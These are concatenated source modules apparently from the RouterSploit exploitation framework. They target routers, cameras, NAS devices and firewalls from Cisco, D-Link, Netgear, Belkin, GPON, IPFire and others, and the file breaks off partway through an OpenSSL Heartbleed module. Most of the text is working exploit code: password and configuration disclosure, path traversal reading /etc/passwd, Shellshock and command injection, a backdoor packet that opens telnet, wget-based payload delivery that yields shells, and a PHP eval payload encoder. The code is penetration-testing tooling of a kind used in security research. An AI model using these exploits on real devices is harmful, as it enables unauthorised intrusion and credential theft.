from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco DPC2420 Info Disclosure",
        "description": "Module exploits Cisco DPC2420 information disclosure vulnerability "
                       "which allows reading sensitive information from the configuration file.",
        "authors": (
            "Facundo M. de la Cruz (tty0) <fmdlc[at]code4life.com.ar>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/23250/",
        ),
        "devices": (
            "Cisco DPC2420",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/filename.gwc",
        )
        if response is None:
            return

        if response.status_code == 200 and "User Password" in response.text:
            print_success("Exploit success - reading configuration file filename.gwc")
            print_info(response.text)
        else:
            print_error("Exploit failed - could not read configuration file")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/filename.gwc",
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "User Password" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DWL-3200AP Password Disclosure",
        "description": "Exploits D-Link DWL3200 access points weak cookie value.",
        "authors": (
            "pws",  # Vulnerability discovery
            "Josh Abraham <sinisterpatrician[at]google.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/34206/",
        ),
        "devices": (
            "D-Link DWL-3200AP",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    # 3600 seconds - one hour means that we will bruteforce authenticated cookie value that was valid within last hour
    seconds = OptInteger(3600, "Number of seconds in the past to bruteforce")

    def run(self):
        if self.check():
            cookie_value = self.get_cookie()
            print_success("Cookie retrieved: {}".format(cookie_value))

            cookie_int = int(cookie_value, 16)
            start = cookie_int - int(self.seconds)

            print_status("Starting bruteforcing cookie value...")
            for i in range(cookie_int, start, -1):
                self.test_cookie(i)
        else:
            print_error("Target does not appear to be vulnerable")

    @mute
    def check(self):
        if self.get_cookie() is not None:
            return True

        return False

    def get_cookie(self):
        pattern = "RpWebID=([a-z0-9]{8})"
        print_status("Attempting to get cookie...")
        try:
            r = self.http_request(
                method="GET",
                path="/",
                timeout=3
            )
            tgt_cookie = re.search(pattern, r.text)
            if tgt_cookie is None:
                print_error("Unable to retrieve cookie")
            else:
                return tgt_cookie.group(1)
        except Exception:
            print_error("Unable to connect to target")

    def test_cookie(self, cookie_int):
        """
        Method that tests all cookies from the past to find one that is valid
        """
        cookies = dict(RpWebID=str(cookie_int))
        try:
            r = self.http_request(
                method='GET',
                path="/html/tUserAccountControl.htm",
                cookies=cookies,
                timeout=10
            )
            if ('NAME="OldPwd"' in r.text):
                print_success("Cookie {} is valid!".format(cookie_int))
                pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
                password = re.findall(pattern, r.content)[0].replace('&', ';&')[1:] + ";"
                print_success("Target password is : {}".format(password))
        except Exception:
            print_error("Unable to connect to target")



from binascii import hexlify
from routersploit.core.exploit.encoders import BaseEncoder
from routersploit.core.exploit.payloads import Architectures


class Encoder(BaseEncoder):
    __info__ = {
        "name": "PHP Hex Encoder",
        "description": "Module encodes PHP payload to Hex format.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PHP

    def encode(self, payload):
        encoded_payload = str(hexlify(bytes(payload, "utf-8")), "utf-8")
        return "eval(hex2bin('{}'));".format(encoded_payload)



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "XiongMai UC-HTTPd Path Traversal",
        "description": "Module exploits UC-HTTPd Path Traversal vulnerability in multiple XiongMai cameras. If target is vulnerable "
                       "it is possible to list directories and read files from the file system.",
        "authors": (
            "keksec",  # vulnerability discovery
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://packetstormsecurity.com/files/142131/uc-httpd-directory-traversal.txt",
            "https://www.cvedetails.com/cve/CVE-2017-7577/",
        ),
        "devices": (
            "Xiongmai Technologies app: Uc-httpd 1.0.0",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from filesystem")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            path = "/../../../../..{}".format(self.filename)
            response = self.http_request(
                method="GET",
                path=path
            )

            if response is None:
                print_error("Exploit failed - could not read response")
                return

            print_status("Reading file: {}".format(self.filename))

            if response.text:
                print_info(response.text)
            else:
                print_status("File seems to be empty")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        path = "/../../../../../etc/passwd"
        response = self.http_request(
            method="GET",
            path=path
        )

        if response and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DSL-2750B RCE",
        "description": "Module exploits remote code execution vulnerability in D-Link DSL-2750B devices. ",
        "authors": (
            "p@ql",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module,
        ),
        "references": (
            "http://seclists.org/fulldisclosure/2016/Feb/53",
            "https://packetstormsecurity.com/files/135706/dlinkdsl2750b-exec.txt",
        ),
        "devices": (
            "D-Link DSL-2750B",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            shell(self, architecture="mipsbe", method="wget", location="/tmp", exec_binary="chmod 777 {0} && {0} && rm {0}")

    def execute(self, cmd):
        path = "/login.cgi?cli=multilingual show';{}'$".format(cmd)
        self.http_request(
            method="GET",
            path=path
        )

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/ayefeaturesconvert.js"
        )

        if response and "DSL-2750B" in response.text:
            version = re.findall(r"AYECOM_FWVER=\"(.*?)\";", response.text)
            if version:
                if utils.Version("1.01") <= utils.Version(version[0]) <= utils.Version("1.03"):
                    return True  # target is vulnerable

        return False  # target is not vulnerable



from collections import OrderedDict

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "LG_NAS_3718.510.a0_RCE",
        "description": "Module exploits LG-NAS Storage Remote Command Execution vulnerability "
                       "in the web-based certificate generator feature.",      
        "authors": (
            "@0x616163",  # vulnerability discovery
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/",
            "https://www.exploit-db.com/exploits/45109",
        ),
        "devices": (
            "3718.510.a0",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def check(self) -> bool:
        # Exploiting this vulnerability requires a valid user account
        # on the target NAS otherwise the vulnerable code is not executed
        parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
        response = self.http_request(
            method="POST",
            path="/en/php/login_check.php",
            data=parameters
        )
        if response:
            if response.text == "NG:WRONG PASSWORD\n":
                print_status("Valid user found: admin for %s:%d", self.host, self.port)
                return True
            if response and response.text == "NG:NO USER\n":
                print_status("User not found: admin for %s:%d", self.host, self.port)
        return False

    def execute(self, cmd: str) -> str:
        parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;' + cmd), ('mobile', 'false')])
        response = self.http_request(
            method="POST", path="/en/php/login_check.php",
            data=parameters, timeout=0.5
        )
        if response and response.status_code == 200:
            return response.text
        return ''

    def run(self):
        if self.check():
            print_success("Target seams %s:%d is vulnerable", self.target, self.port)
            shell(self, architecture='armle', binary="/usr/bin/nc", shell="/bin/bash")
        else:
            print_error("Exploit failed - target %s:%d seems to be not vulnerable", self.target, self.port)



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Belkin G & N150 Password Disclosure",
        "description": "Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format",
        "authors": (
            "Aodrulez <f3arm3d3ar[at]gmail.com>",  # vulnerability discovery
            "Avinash Tangirala",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765",
            "https://www.exploit-db.com/exploits/17349/",
        ),
        "devices": (
            "Belkin G",
            "Belkin N150",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response = self.http_request(
            method="GET",
            path="/login.stm",
        )
        if response is None:
            return

        val = re.findall(r'password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            print_success("Exploit success")
            data = [('admin', val[0])]
            headers = ("Login", "MD5 Password")
            print_table(headers, *data)

        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/login.stm",
        )
        if response is None:
            return False  # target is not vulnerable

        val = re.findall(r'password\s?=\s?"(.+?)"', response.text)  # in some fw there are no spaces

        if len(val):
            return True  # target vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "MVPower DVR Jaws RCE",
        "description": "Module exploits MVPower DVR Jaws RCE vulnerability through 'shell' resource."
                       "Successful exploitation allows remote unauthorized attacker to execute "
                       "commands on operating system level. Vulnerablity was actively used by "
                       "IoT Reaper botnet.",
        "authors": (
            "Paul Davies (UHF-Satcom)",  # initial vulnerability discovery and PoC
            "Andrew Tierney (Pen Test Partners)",  # independent vulnerability discovery and PoC
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/",
            "https://www.pentestpartners.com/security-blog/pwning-cctv-cameras",
        ),
        "devices": (
            "MVPower model TV-7104HE firmware version 1.8.4 115215B9",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            shell(self, architecture="armle", method="echo", location="/tmp")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        path = "/shell?{}".format(cmd)
        response = self.http_request(
            method="GET",
            path=path,
        )

        if response:
            return response.text

        return ""

    @mute
    def check(self):
        mark = utils.random_text(16)
        cmd = "echo {}".format(mark)

        if mark in self.execute(cmd):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco Video Surveillance Path Traversal",
        "description": "Module exploits path traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices. "
                       "If the target is vulnerable it allows to read files from the filesystem.",
        "authors": (
            "b.saleh",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/38389/",
        ),
        "devices": (
            "Cisco Video Surveillance Operations Manager 6.3.2",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from the filesystem")

    def run(self):
        if self.check():
            path = "/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.filename)

            response = self.http_request(
                method="GET",
                path=path
            )

            if response and response.status_code == 200 and len(response.text):
                print_success("Exploit success")
                print_status("Reading file: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read file")
        else:
            print_error("Exploit failed - device seems to be not vulnerable")

    @mute
    def check(self):
        path = "/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd"

        response = self.http_request(
            method="GET",
            path=path
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from time import sleep
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "GPON Home Gateway RCE",
        "description": "Module exploits GPON Home Gatewa command injection vulnerability, that allows "
                       "executing commands on operating system level.",
        "authors": (
            "VPNMentor",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
        ),
        "devices": (
            "GPON Home Gateway",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            shell(self, architecture="mipsbe", method="wget", location="/var/tmp/")
        else:
            print_error("Exploit failed - target does not seem to be vulnerable")

    def execute(self, cmd):
        payload = "`{cmd}`;{cmd}".format(cmd=cmd)
        data = {
            "XWebPageName": "diag",
            "diag_action": "ping",
            "wan_conlist": "0",
            "dest_host": payload,
            "ipv": "0"
        }
        self.http_request(
            method="POST",
            path="/GponForm/diag_Form?images/",
            data=data
        )

        response = self.retrieve_response()
        if not response:
            sleep(3)
            response = self.retrieve_response()

        return response

    def retrieve_response(self):
        response = self.http_request(
            method="GET",
            path="/diag.html?images/"
        )

        if response:
            res = re.findall(r"diag_result = \"(.*?)\\nNo traceroute test.", response.text)
            if res:
                return res[0].replace("\\n", "\n")

        return ""

    @mute
    def check(self):
        mark = utils.random_text(12)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)
        if mark in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import asyncio
from pysnmp.hlapi.v3arch.asyncio import *

from routersploit.core.exploit.exploit import Exploit
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.exploit.option import OptBool
from routersploit.core.exploit.printer import print_success
from routersploit.core.exploit.printer import print_error


SNMP_TIMEOUT = 15.0


class SNMPCli:
    """ SNMP Client provides methods to handle communication with SNMP server """

    def __init__(self, snmp_target: str, snmp_port: int, verbosity: bool = False) -> None:
        """ SNMP client constructor

        :param str snmp_target: target SNMP server ip address
        :param port snmp_port: target SNMP server port
        :param bool verbosity: display verbose output
        :return None:
        """

        self.snmp_target = snmp_target
        self.snmp_port = snmp_port
        self.verbosity = verbosity

        self.peer = "{}:{}".format(self.snmp_target, snmp_port)

    def get(self, community_string: str, oid: str, version: int = 1, retries: int = 0) -> bytes:
        """ Get OID from SNMP server

        :param str community_string: SNMP server community string
        :param str oid: SNMP server oid
        :param int version: SNMP protocol version
        :param int retries: number of retries
        :return bytes: SNMP server response
        """

        return asyncio.run(self.get_cmd(
            community_string,
            oid,
            version,
            retries
        ))

    async def get_cmd(self, community_string: str, oid: str, version: int, retries: int):
        """ Retrieves OID from SNMP server

        :param str community_string: SNMP server community string
        :param str oid: SNMP server oid
        :param int version: SNMP protocol version
        :param int retries: number of retries
        :return bytes: SNMP server response
        """

        snmpEngine = SnmpEngine()

        iterator = get_cmd(
            snmpEngine,
            CommunityData(community_string, mpModel=version),
            await UdpTransportTarget.create((self.snmp_target, self.snmp_port), timeout=SNMP_TIMEOUT, retries=retries),
            ContextData(),
            ObjectType(ObjectIdentity(oid))
        )

        errorIndication, errorStatus, errorIndex, varBinds = await iterator
        snmpEngine.close_dispatcher()

        if errorIndication or errorStatus:
            print_error(self.peer, "SNMP invalid community string: '{}'".format(community_string), verbose=self.verbosity)
        else:
            print_success(self.peer, "SNMP valid community string found: '{}'".format(community_string), verbose=self.verbosity)
            return varBinds

        return None


# pylint: disable=no-member
class SNMPClient(Exploit):
    """ SNMP Client exploit """

    target_protocol = Protocol.SNMP

    verbosity = OptBool(True, "Enable verbose output: true/false")

    def snmp_create(self, target: str = None, port: int = None) -> SNMPCli:
        """ Create SNMP client

        :param str target: target SNMP server ip address
        :param int port: target SNMP server port
        :return SNMPCli: SNMP client object
        """

        snmp_target = target if target else self.target
        snmp_port = port if port else self.port

        snmp_client = SNMPCli(snmp_target, snmp_port, verbosity=self.verbosity)
        return snmp_client



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Cisco UCS Manager RCE",
        "description": "Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which "
                       "allows executing commands on operating system level.",
        "authors": (
            "thatchriseckert",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/39568/",
            "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash",
        ),
        "devices": (
            "Cisco UCS Manager 2.1 (1b)",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        mark = utils.random_text(32)
        headers = {
            "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo "$(%s)"; echo %s;' % (mark, cmd, mark)
        }

        response = self.http_request(
            method="GET",
            path="/ucsm/isSamInstalled.cgi",
            headers=headers
        )
        if response is None:
            return ""

        if mark in response.text:
            regexp = "%s(|.+?)%s" % (mark, mark)
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "BEWARD N100 RCE",
        "description": "BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution."
                       'shodan search: WWW-Authenticate: Basic realm="N100 H.264 IP Camera"'
                       'censys search: services.http.response.headers.www_authenticate:"N100 H.264 IP Camera"'
                       'zoomeye search: "headers:\"N100 H.264 IP Camera\"',
        "authors": (
            "@0x616163",  # vulnerability discovery
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/46319",
        ),
        "devices": (
            "BEWARD N100 H.264 VGA",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def execute(self, cmd: str) -> str:
        response = self.http_request(
            method="GET",
            path='/cgi-bin/operator/servetest',
            headers={"Authorization": "Basic YWRtaW46YWRtaW4="},
            params={
                'cmd': 'ntp',
                'ServerName': 'pool.ntp.org',
                'TimeZone': f'03:00|{cmd}||'
            }
        )
        if response:
            return response.text
        return ''

    def check(self) -> bool:
        response = self.http_request(method='GET', path='/')
        if response:
            if response.headers.get('WWW-Authenticate') and 'N100 H.264' in response.headers.get('WWW-Authenticate'):
                return True
        return False

    def run(self):
        if self.check():
            print_success("Target seams %s:%d is vulnerable", self.target, self.port)
            print_status("lets try armle")
            shell(
                self,
                architecture="armle",
                method="wget",
                location="/var/",
                exec_binary=['chmod 777 {}', '{}']
            )
            # print_status('Target: %s:%d => output: "%s"', self.target, self.port, self.execute(self.command))
        else:
            print_error("Exploit failed - target %s:%d seems to be not vulnerable", self.target, self.port)



from routersploit.core.exploit import *
from routersploit.core.bluetooth.btle_client import BTLEClient


class Exploit(BTLEClient):
    __info__ = {
        "name": "Bluetooth LE Scan",
        "description": "Scans for Bluetooth Low Energy devices.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/",
        ),
    }

    enum = OptBool(False, "Automatically enumerate services: true/false")
    buffering = OptBool(False, "Buffering enabled: true/false. Results in real time.")

    def run(self):
        devices = self.btle_scan()

        for device in devices:
            if not self.buffering:
                device.print_info()

            if self.enum:
                device.print_services()



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "IPFire Proxy RCE",
        "description": "Module exploits IPFire < 2.19 Core Update 101 Remote Code Execution "
                       "vulnerability which allows executing commands on operating system level.",
        "authors": (
            "Yann CAM",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/39765/",
            "http://www.ipfire.org/news/ipfire-2-19-core-update-101-released",
        ),
        "devices": (
            "IPFire < 2.19 Core Update 101",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(444, "Target HTTP port")
    ssl = OptBool(True, "SSL enabled: true/false")

    username = OptString("admin", "Username to log in with")
    password = OptString("admin", "Password to log in with")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self,
                  architecture="cmd",
                  method="cmd",
                  payloads=["awk"])
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": self.get_target_url(path="/cgi-bin/proxy.cgi"),
        }

        payload = "||{};#".format(cmd)

        data = {
            "NCSA_USERNAME": utils.random_text(12),
            "NCSA_GROUP": "standard",
            "NCSA_PASS": payload,
            "NCSA_PASS_CONFIRM": payload,
            "SUBMIT": "Create+user",
            "ACTION": "Add",
            "NCSA_MIN_PASS_LEN": "6",
        }

        response = self.http_request(
            method="POST",
            path="/cgi-bin/proxy.cgi",
            headers=headers,
            data=data,
            auth=(self.username, self.password),
        )

        if response:
            end = response.text.find("<!DOCTYPE html>")

            if end:
                return response.text[:end]

        return ""

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient
from routersploit.core.telnet.telnet_client import TelnetClient


class Exploit(UDPClient, TelnetClient):
    __info__ = {
        "name": "D-Link DWR-932B",
        "description": "Module exploits D-Link DWR-932B backdoor vulnerability which allows "
                       "executing command on operating system level with root privileges.",
        "authors": (
            "Pierre Kim @PierreKimSec",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://pierrekim.github.io/advisories/2016-dlink-0x00.txt",
        ),
        "devices": (
            "D-Link DWR-932B",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(39889, "Target Telnet port")

    def run(self):
        print_status("Sending backdoor packet")
        if self.check():
            telnet_client = self.telnet_create(port=23)
            if telnet_client.connect():
                telnet_client.interactive()
                telnet_client.close()
            else:
                print_error("Exploit failed - could not connect to the telnet service")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        udp_client = self.udp_create()
        udp_client.send(b"HELODBG")

        response = udp_client.recv(1024)
        if response and b"Hello" in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear Multi Password Disclosure",
        "description": "Module exploits Password Disclosure vulnerability in multiple Netgear devices. "
                       "If target is vulnerable administrator\'s password is retrieved. "
                       "This exploit only works if \'password recovery\' in router settings is OFF. "
                       "If the exploit has already been run, then it might not work anymore until device reboot.",
        "authors": (
            "Simon Kenin <Trustwave SpiderLabs>",  # vulnerability discovery
            "0BuRner",  # routersploit module
        ),
        "references": (
            "https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911",
            "https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/",
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5521",
            "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5521",
            "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability",
        ),
        "devices": (
            "Netgear D6220",
            "Netgear D6400",
            "Netgear R6200v2",
            "Netgear R6250",
            "Netgear R6300v2",
            "Netgear R6400",
            "Netgear R6700",
            "Netgear R6900",
            "Netgear R7000",
            "Netgear R7100LG",
            "Netgear R7300DST",
            "Netgear R7900",
            "Netgear R8000",
            "Netgear R8300",
            "Netgear R8500",
            "Netgear WNDR3400v2",
            "Netgear WNDR3400v3",
            "Netgear WNR3500Lv2",
            "Netgear WNDR4500v2",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            response = self.http_request(
                method="GET",
                path="/",
            )

            if response is not None:
                # Detect model
                model = response.headers.get('WWW-Authenticate')[13:-1]

                # Grab token if exists
                token = self.extract_token(response.text)
                if token is False:
                    token = "routersploit"
                    print_status("Token not found")
                else:
                    print_status("Token found: {}".format(token))

                # Detect firmware version
                response = self.http_request(
                    method="GET",
                    path="/currentsetting.htm",
                )
                fw_version = ""
                if response is not None and response.status_code == 200:
                    fw_version = self.scrape(response.text, 'Firmware=', 'RegionTag').strip('\r\n')

                print_status("Detected model: {} (FW: {})".format(model, fw_version))

                # Exploit vulnerability
                path = "/passwordrecovered.cgi?id={}".format(token)
                response = self.http_request(
                    method="POST",
                    path=path
                )

                if response.text.find('left\">') != -1:
                    username, password = self.extract_password(response.text)
                    print_success('Exploit success! login: {}, password: {}'.format(username, password))
                else:
                    print_error("Exploit failed. Could not extract credentials. Reboot your device and try again.")
            else:
                print_error("Exploit failed. Could not extract credentials.")
        else:
            print_error("Target is not vulnerable")

    @staticmethod
    def scrape(text, start_trig, end_trig):
        if text.find(start_trig) != -1:
            return text.split(start_trig, 1)[-1].split(end_trig, 1)[0]
        else:
            return False

    @staticmethod
    def extract_token(html):
        return Exploit.scrape(html, 'unauth.cgi?id=', '\"')

    @staticmethod
    def extract_password(html):
        username = (repr(Exploit.scrape(html, 'Router Admin Username</td>', '</td>')))
        username = Exploit.scrape(username, '>', '\'')
        password = (repr(Exploit.scrape(html, 'Router Admin Password</td>', '</td>')))
        password = Exploit.scrape(password, '>', '\'')
        if username is False:
            username = (Exploit.scrape(html[html.find('left\">'):-1], 'left\">', '</td>'))
            password = (Exploit.scrape(html[html.rfind('left\">'):-1], 'left\">', '</td>'))

        password = password.replace("&#35;", "#").replace("&#38;", "&")

        return username, password

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/"
        )

        if response is not None:
            header = response.headers.get('WWW-Authenticate')
            token = self.extract_token(response.text)
            return header is not None and 'NETGEAR' in header.upper() and token is not False  # target is vulnerable

        return False  # target is not vulnerable



import re
import binascii
from time import time
from struct import pack, unpack
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from routersploit.core.exploit import *
from routersploit.core.exploit.exploit import Protocol
from routersploit.core.tcp.tcp_client import TCPClient


class Exploit(TCPClient):
    __info__ = {
        "name": "OpenSSL Heartbleed",
        "description": "Exploits OpenSSL Heartbleed vulnerability. Vulnerability exists in the handling of heartbeat requests,"
                       " where fake length can be used to leak memory data in the response. This module is heavily based on "
                       " Metasploit module.",
        "authors": (
            "Neel Mehta",  # vulnerability discovery
            "Riku",  # vulnerability discovery
            "Antti",  # vulnerability discovery
            "Matti",  # vulnerability discovery
            "Jared Stafford <jspenguin[at]jspenguin.org>",  # Original Proof of Concept. This module is based on it.
            "FiloSottile",  # PoC site and tool
            "Christian Mehlmauer",  # metasploit module
            "wvu",  # metasploit module
            "juan vazquez",  # metasploit module
            "Sebastiano Di Paola",  # metasploit module
            "Tom Sellers",  # metasploit module
            "jjarmoc",  # metasploit module; keydump, refactoring..
            "Ben Buchanan",  # metasploit module
            "herself",  # metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.cvedetails.com/cve/2014-0160",
            "http://heartbleed.com/",
            "https://www.us-cert.gov/ncas/alerts/TA14-098A",
            "https://gist.github.com/takeshixx/10107280",
            "https://github.com/FiloSottile/Heartbleed",
            "http://filippo.io/Heartbleed/",
            "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb",
        ),
        "devices": (
            "Multi",
        ),
    }

    target_protocol = Protocol.HTTP

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(443, "Target HTTP port")

    tls_version = OptString("1.0", "TLS/SSL version to use: SSLv3, 1.0, 1.1, 1.2")
    heartbeat_length = OptInteger(65535, "Heartbeat length")

    CIPHER_SUITS = (
        0xc014,  # TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
        0xc00a,  # TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
        0xc022,  # TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA
        0xc021,  # TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA
        0x0039,  # TLS_DHE_RSA_WITH_AES_256_CBC_SHA
        0x0038,  # TLS_DHE_DSS_WITH_AES_256_CBC_SHA
        0x0088,  # TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
        0x0087,  # TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA
        0x0087,  # TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
